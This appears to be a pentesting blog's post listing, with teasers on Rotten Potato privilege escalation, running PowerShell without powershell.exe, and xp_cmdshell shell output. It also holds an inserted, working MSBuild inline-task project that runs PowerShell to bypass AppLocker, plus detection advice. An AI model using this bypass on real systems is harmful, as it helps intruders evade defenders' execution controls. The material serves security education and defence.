The lonely potato

Never heard of the "Rotten Potato"? If not, read this post by the authors of this fantastic exploit before continuing: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ The mechanism is quite complex: it allows us to intercept the NTLM authentication challenge that occurs during DCOM activation through our endpoint listener and impersonate the user's security access token (in this case…

We don’t need powershell.exe – 4 –

This seems to be a never-ending story but, believe me, there are so many ways to achieve the same result! This time we are going to use another simple technique for running our PowerShell scripts without invoking powershell.exe. Introducing MSBuild.exe... MSBuild is a tool included in the .NET Framework for automating the process of creating…
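As an added example (not code from the original post), here is a minimal MSBuild project that hosts PowerShell inside an inline C# task, so the script runs in the MSBuild.exe process and powershell.exe is never started. It assumes the .NET Framework 4.x MSBuild (the CodeTaskFactory from Microsoft.Build.Tasks.v4.0.dll) and that System.Management.Automation is available in the GAC, which is the case wherever Windows PowerShell is installed; the task name `RunPS` and the harmless `Get-Process` script are placeholders to replace with your own.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- run.csproj: MSBuild.exe hosts PowerShell via System.Management.Automation.
     Invoke with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe run.csproj -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

  <!-- The default target simply executes our inline task. -->
  <Target Name="Run">
    <RunPS />
  </Target>

  <!-- CodeTaskFactory compiles the C# below at build time; no separate binary is dropped on disk. -->
  <UsingTask TaskName="RunPS"
             TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <!-- PowerShell engine assembly (assumed to be in the GAC, as it is on any host with Windows PowerShell). -->
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

// Task class name must match the TaskName attribute above.
public class RunPS : Task
{
    public override bool Execute()
    {
        // Placeholder script: list the three processes with the largest working set.
        const string script =
            "Get-Process | Sort-Object WS -Descending | Select-Object -First 3 Name,Id,WS | Out-String";

        using (Runspace rs = RunspaceFactory.CreateRunspace())
        {
            rs.Open();
            using (PowerShell ps = PowerShell.Create())
            {
                ps.Runspace = rs;
                ps.AddScript(script);
                // Pipeline output is written to the MSBuild log (stdout) at High importance so it is visible by default.
                foreach (PSObject obj in ps.Invoke())
                    Log.LogMessage(MessageImportance.High, obj.ToString());

                // Surface script errors as build errors instead of silently succeeding.
                foreach (ErrorRecord err in ps.Streams.Error)
                    Log.LogError(err.ToString());
            }
        }
        return !Log.HasLoggedErrors;
    }
}
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```

Because MSBuild.exe lives under the Windows directory it is allowed by AppLocker's default path rules, which is exactly why this works; a defender should add it to the block list (Microsoft's recommended block rules include MSBuild.exe) and watch for MSBuild.exe loading System.Management.Automation.dll (for example Sysmon Event ID 7, Image loaded) or being launched from parents other than a build tool.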

“Poor man’s process migration”

In your pentesting activities, there are many circumstances where you need to "migrate" your Windows working process, typically a shell, to a different process. Some scenarios are: you have an unstable shell and need to move to a more robust process on the victim's machine (typically explorer.exe, which will live until the victim doesn't…

We don’t need powershell.exe -part 3-

This is the third part of my "powershell-less" series: how to execute PowerShell scripts without using powershell.exe. In part 2 I used DotNetToJscript in order to circumvent an AppLocker policy. Now let's try to use another technique. The problem is always the same: we cannot run executable files outside the Windows directories and we can't run powershell.exe. Never heard…

We don’t need powershell.exe – part 2 –

In my previous post I showed you how to bypass policy restrictions which won't let you execute powershell.exe. Now let's move on to a more complicated (but realistic) scenario: you can't run exe files located outside the "classic" Windows directories because there is an AppLocker policy which won't permit it. Say bye-bye to PowerShell?…

We don’t need powershell.exe

Please don't misunderstand me, you really need PowerShell and all its magic if you are a pentester, don't you? But what can you do if some policy is blocking access to powershell.exe? Yes, this is a well known problem and there are many solutions. In my article I just want to focus on a quick…

The road to “silver”

Remember my last post, the "SYSTEM" challenge? Now let's modify the scenario... Imagine you've got xp_cmdshell running under this account:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[21:52:27] [INFO] the SQL query used returns 1 entries
[21:52:27] [INFO] retrieved: dummydomain\\andrew
command standard output [1]:
[*] dummydomain\andrew

Oh! This…